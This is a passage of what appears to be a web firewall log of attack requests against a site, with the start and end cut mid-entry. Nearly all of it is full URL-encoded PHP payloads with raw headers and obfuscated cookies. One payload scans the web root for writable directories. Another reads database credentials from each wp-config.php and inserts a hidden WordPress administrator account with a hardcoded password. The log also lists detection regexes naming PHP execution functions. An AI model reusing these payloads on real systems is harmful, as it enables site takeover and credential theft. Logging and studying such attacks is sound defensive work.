%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 10:20:09","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> eH:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\ncookie:4=ce288246c7d2df0454c666077eb603cf; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvMHtvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaOupaEcqTyiovV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36\nsec-ch-ua:\"Chromium\";v=\"110\", \"Not A(Brand\";v=\"24\", \"Google Chrome\";v=\"110\"\nsec-fetch-site:none\nsec-ch-ua-mobile:?0\nsec-fetch-mode:navigate\nsec-ch-ua-platform:\"Windows\"\nhost:dewenlabels.com\nsec-fetch-user:?1\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncontent-length:3339\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-dest:document\n\neH=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 12:06:27","213.209.159.254","POST","\/","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Ti:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-dest:document\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-length:12640\ncookie:4=9502d8dfeef0bdc4da77dd3a93ec6aec; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvITxvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAyoaEypvV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\nsec-ch-ua:\"Google Chrome\";v=\"119\", \"Chromium\";v=\"119\", \"Not?A_Brand\";v=\"24\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"macOS\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-user:?1\nsec-fetch-site:none\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36\nsec-fetch-mode:navigate\n\nTi=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%2